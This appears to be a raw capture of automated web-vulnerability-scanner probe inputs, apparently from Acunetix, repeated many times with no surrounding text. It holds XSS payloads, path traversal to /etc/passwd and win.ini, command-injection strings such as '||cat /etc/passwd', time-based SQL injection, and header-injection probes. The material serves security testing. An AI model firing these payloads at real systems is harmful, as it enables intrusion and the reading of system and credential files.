1some_inexistent_file_with_long_name%00.jpg

z4oJkMKA'

\xf6<img acu onmouseover=prompt(956391) //\xf6>

!(()&&!|*|*|

/etc/passwd

1

'"()

YlS1cDLA')

1<input autofocus onfocus=prompt(912214)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

^(#$!@#$)(()))******

ky6rkPfM'))

'

1

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

1

-1

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

1_ca6Vm <ScRiPt >prompt(983682)</ScRiPt>

1

-1))

comments

1

&dir

1

1

1

http://hitvaHKZMxUrr.bxss.me/

comments

ZDGhBQXj'

1

1

'&dir&'

file:///etc/passwd

1

1

1

1

T1IknjRF')

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

1

'"

HpnO70Hp'))

1

1

1

WEB-INF/web.xml

1

|dir

1

1

<!--

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(953522)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

'"()&%<ScRiPt >prompt(924889)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1_959468

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acu7141\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7141

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

acux1564\xc0\xbez1\xc0\xbcz2a\x90bcxuca1564

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(913655)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<script>prompt(989353)</script>

1

1

1

1<ScRiPt >prompt(916455)</ScRiPt>

1

1

1

WEB-INF/web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955787></ScRiPt>

1

1

1

1<ScRiPt >prompt(912814)</ScRiPt>

WEB-INF\web.xml

1

1<video><source onerror="javascript:prompt(959347)">

1

1

1

response.write(9783213*9582676)

1

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(982183)"></g></svg>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9783213*9582676)+'

1

1

1<div style=width:expression(prompt(910186))>

'&cat /etc/passwd&'

1

1

"+response.write(9783213*9582676)+"

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"&cat /etc/passwd&"

1<iframe src='data:text/html

${99818+99076}

1

1

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<body onload=prompt(979877)>

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n904144=v996797

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(995458)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

)

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(965868)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

-1)

1

1<img/src=">" onerror=alert(924977)>

!(()&&!|*|*|

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1))

'"()

1

1

/etc/passwd

"|"ld

^(#$!@#$)(()))******

'

1<ScRiPt%20>prompt(940724)</sCripT>

1

1

Q53SNKH4'

1

1

"

1&lt

1

1

1

kLlEMLE9')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

\xf6<img acu onmouseover=prompt(913818) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

'

1

http://hitnQsGod0Ry4.bxss.me/

UYjhfrZp'))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

${@print(md5(acunetix_wvs_security_test))}\

1<input autofocus onfocus=prompt(981984)>

1

1

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

comments

1

-1)

1

1

http://www.acunetix.tst

-1))

&dir

comments

[url=http://www.acunetix.com]website security[/url]

1

kY1IIVuW'

file:///etc/passwd

1'"()&%<ScRiPt >prompt(917638)</ScRiPt>

1

'"

1

comments/.

1_1lXfm <ScRiPt >prompt(945544)</ScRiPt>

1

'&dir&'

1

<!--

'"()&%<ScRiPt >prompt(916296)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

tlyNAsR2')

1

1

1

1

1

"&dir&"

pj3mOflK'))

WEB-INF/web.xml

1_907095

1

|dir

1

1

1

1

1

WEB-INF\web.xml

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu1990\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1990

1

../../../../../../../../../../boot.ini

acux7868\xc0\xbez1\xc0\xbcz2a\x90bcxuca7868

1

1<ScRiPt >prompt(908922)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(998333)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(959709)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917962></ScRiPt>

1

1

1<ScRiPt >prompt(911848)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(924651)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952927)"></g></svg>

1

1

response.write(9525956*9998129)

1

1<div style=width:expression(prompt(902378))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9525956*9998129)+'

1

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

"+response.write(9525956*9998129)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<body onload=prompt(990526)>

../../../../../../../../../../etc/passwd

${99601+100304}

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947010)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

WEB-INF/web.xml

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(992191)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

`cat /etc/passwd`

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1&n937089=v951279

|cat /etc/passwd#

1

)

1<img/src=">" onerror=alert(984212)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(912864)</sCripT>

1

!(()&&!|*|*|

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1)

"|"ld

'"()

1

^(#$!@#$)(()))******

1

1&lt

1

-1))

'

1

/etc/passwd

\xf6<img acu onmouseover=prompt(916230) //\xf6>

1

1

1

1

'

1

"

se4nOg51'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(926297)>

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

stMI2A4q')

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

1

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

jy7GD59Y'))

1_vaIvC <ScRiPt >prompt(997214)</ScRiPt>

1

http://hitAcP31Fxr7D.bxss.me/

1

1

&dir

1

1

-1

acunetix_wvs_invalid_filename

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

1

1

comments

-1)

"&dir&"

1

1

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

comments

1'"()&%<ScRiPt >prompt(927034)</ScRiPt>

|dir

'"

-1))

comments/.

1

WEB-INF/web.xml

1

1

59EEQBhq'

'"()&%<ScRiPt >prompt(953541)</ScRiPt>

<!--

'|dir

2TaZ6mEy')

1

1

1

WEB-INF\web.xml

"|dir

1

1_919953

2Lc6EHaG'))

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

acu6847\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6847

1

1

acux9416\xc0\xbez1\xc0\xbcz2a\x90bcxuca9416

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(957044)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<script>prompt(925650)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(949439)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951307></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(953431)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(990610)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987062)"></g></svg>

1

1

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(938716))>

response.write(9974649*9505796)

1

1

WEB-INF\web.xml

1

1

1

1<iframe src='data:text/html

'+response.write(9974649*9505796)+'

1

1

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(984097)>

"+response.write(9974649*9505796)+"

1

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(930805)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=xyz OnErRor=prompt(974667)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(966016)>

-1

${99980+99768}

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1

1<ScRiPt%20>prompt(966585)</sCripT>

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n901103=v910570

1&lt

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

ChglpMX4'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

\xf6<img acu onmouseover=prompt(992085) //\xf6>

1

/etc/passwd

)

enzuoxhz')

testasp.vulnweb.com

1

'"()

1<input autofocus onfocus=prompt(980107)>

"|"ld

1

RFGAGoGU'))

!(()&&!|*|*|

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

-1

1

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1_30IHw <ScRiPt >prompt(974717)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitcDhe70jlFh.bxss.me/

"

1

acunetix_wvs_invalid_filename

1

1

1

PDuiBAoc'

||cat /etc/passwd

1

comments

1

1

&dir

1

XI0eprHt')

1

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

http://www.acunetix.tst

1

1

MW6QObCP'))

1

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

1

comments/.

1

'"

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(919789)</ScRiPt>

1

|dir

1

'"()&%<ScRiPt >prompt(999488)</ScRiPt>

1

WEB-INF\web.xml

<!--

'|dir

1

1_927080

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8878\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8878

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux5592\xc0\xbez1\xc0\xbcz2a\x90bcxuca5592

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(913499)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(933141)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(997032)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917270></ScRiPt>

1

1

response.write(9026465*9757208)

1

1<ScRiPt >prompt(952596)</ScRiPt>

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

1<video><source onerror="javascript:prompt(924893)">

'+response.write(9026465*9757208)+'

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9026465*9757208)+"

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984532)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1<div style=width:expression(prompt(985083))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

${100358+100188}

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<iframe src='data:text/html

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

1

1

1

1

1<body onload=prompt(961293)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1

1

)

1&n921785=v918296

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980265)>

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(904203)>

'|'ld

1

1

-1))

1

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<img/src=">" onerror=alert(964007)>

1

6NSVT4hD'

"|"ld

1

1<ScRiPt%20>prompt(940260)</sCripT>

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

'"()

qf48PyfI')

1

1

1

1&lt

/etc/passwd

'

"

1

6Lz9nkNl'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

${@print(md5(acunetix_wvs_security_test))}

\xf6<img acu onmouseover=prompt(957817) //\xf6>

1

-1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

acunetix_wvs_invalid_filename

1<input autofocus onfocus=prompt(905034)>

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

http://hitZDSlIWm4KQ.bxss.me/

-1))

<a href='http://www.acunetix.com'>website security</a>

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

comments

[url=http://www.acunetix.com]website security[/url]

VnYMEnpG'

1

1

1

'&dir&'

1

1

http://www.acunetix.tst

tJAHjJsf')

comments/.

1_XvZQu <ScRiPt >prompt(928378)</ScRiPt>

file:///etc/passwd

"&dir&"

1'"()&%<ScRiPt >prompt(948511)</ScRiPt>

'"

1

1

1

1

cA3PX3Un'))

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

'"()&%<ScRiPt >prompt(919489)</ScRiPt>

|dir

1

WEB-INF/web.xml

1

1

1

'|dir

1_960480

1

1

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

acu1199\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1199

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9668\xc0\xbez1\xc0\xbcz2a\x90bcxuca9668

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(944711)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(966206)</script>

1

1<ScRiPt >prompt(935050)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?926397></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(981154)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(985327)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919406)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9397400*9509185)

1<div style=width:expression(prompt(977574))>

1

1

1

1

'+response.write(9397400*9509185)+'

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

"+response.write(9397400*9509185)+"

1

1

1<body onload=prompt(990362)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968065)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(981101)>

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

${99819+99503}

cat /etc/passwd

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(929213)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1&n957767=v951202

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<ScRiPt%20>prompt(952572)</sCripT>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

|cat /etc/passwd#

1

-1))

1

1&lt

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

'|'ld

7PrhLE35'

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(979532) //\xf6>

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

"|"ld

1

ksDvUBpU')

1

1

1

'

1<input autofocus onfocus=prompt(964047)>

/etc/passwd

1

6gZ4KjYB'))

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

"

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

"

1

http://hit4MlrMb97Ei.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1_Nzd33 <ScRiPt >prompt(915676)</ScRiPt>

comments

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

1

1

1

Jj6nnoC5'

1

&dir

http://www.acunetix.tst

1

comments

file:///etc/passwd

1

ChhHr4DW')

'"

1

1

'&dir&'

1'"()&%<ScRiPt >prompt(925315)</ScRiPt>

comments/.

<!--

zgbzqKll'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"&dir&"

'"()&%<ScRiPt >prompt(924108)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

1

1_947346

|dir

1

1

1

'|dir

1

1

WEB-INF\web.xml

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

acu3824\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3824

1

1

1

../../../../../../../../../../boot.ini

1

acux3849\xc0\xbez1\xc0\xbcz2a\x90bcxuca3849

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(944237)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(980237)</script>

1

1

1

................windowswin.ini

1

1<ScRiPt >prompt(965128)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?909435></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(906920)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(941702)">

1

1

response.write(9452148*9350736)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915619)"></g></svg>

1

1

1

'+response.write(9452148*9350736)+'

&cat /etc/passwd&

1

1<div style=width:expression(prompt(919970))>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

"+response.write(9452148*9350736)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<body onload=prompt(995274)>

1

"&cat /etc/passwd&"

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

${99704+100041}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991606)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(905245)>

1

`cat /etc/passwd`

1

1

-1)

1

1&n916328=v913957

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

)

